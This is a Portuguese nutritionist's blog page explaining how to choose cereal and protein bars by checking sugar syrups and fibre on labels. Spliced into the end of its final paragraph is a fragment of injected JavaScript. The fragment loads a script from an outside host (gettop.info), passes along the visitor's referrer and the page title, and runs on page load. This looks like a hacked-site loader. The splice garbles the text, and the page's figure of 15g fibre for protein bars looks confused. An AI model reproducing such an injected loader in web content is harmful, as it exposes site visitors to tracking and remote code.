Barrinha de cereais: será que todas são saudáveis?

A correria dos dias de hoje torna mais complicado escolher as frutas e preparar os lanches para o consumo fora de casa. Nesse contexto as barrinhas de cereais surgem como aliadas para a solução do problema. . Além de já estarem prontas, as barrinhas  podem ser transportadas e ficarem  na bolsa por uma semana ou mais sem estragar.. Então na hora que a fome bate no meio da manhã ou no final da tarde, elas podem ser consumidas e  não deixar que as tentações maiores como o tablete de chocolate ou o bombom cheguem perto. As barrinhas também garantem energia e ao mesmo tempo diminuem a vontade daquele docinho do final da tarde, mas o segredo está na escolha correta!

A maioria das marcas utiliza na sua composição muito xarope de glicose ou de milho e isso é açúcar puro. Algumas tem  uma quantidade de fibras muito pequena, por volta de 1g ou menos , o que não vai garantir a saciedade pelas 2-3 horas seguintes.. Por isso, prestar atenção nas informações nutricionais é essencial! Fique de olho no rótulo: a quantidade de fibras que deve estar acima de 1,5g no mínimo. Se tiver abaixo indica que, na verdade, tem mais açúcar que cereal.

Outra opção são de lanche são as barrinhas de proteína. Elas  apresentam em média 15g  de fibra e  “ sustentam” mais do que a barrinha comum que tem até 2g somente. Porém nenhuma delas podem ser utilizadas como “substitutas de uma refeição” porque apresentam carências em outros nutrientes importantes presentes numa refeição saudável completa..  Então as barrinhas devem entrar no grupo dos lanchinhos intermediários da manhã e da tarde, sem esquecer  das outras opções como as frutas frescas, frutas secas e/ou castanhas.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Endereço: Rua Visconde de Pirajá, 351 sala 1204- Ed. Fórum de Ipanema - Ipanema/RJ - Telefone: 21 3497-3929 / 9907-7585

© Copyright 2012 :: Gabriela Maia Nutricionista :: www.gabrielamaianutricionista.com.br

Criação de sites: Niterói WebSites | Comunicação: Dona Comunicação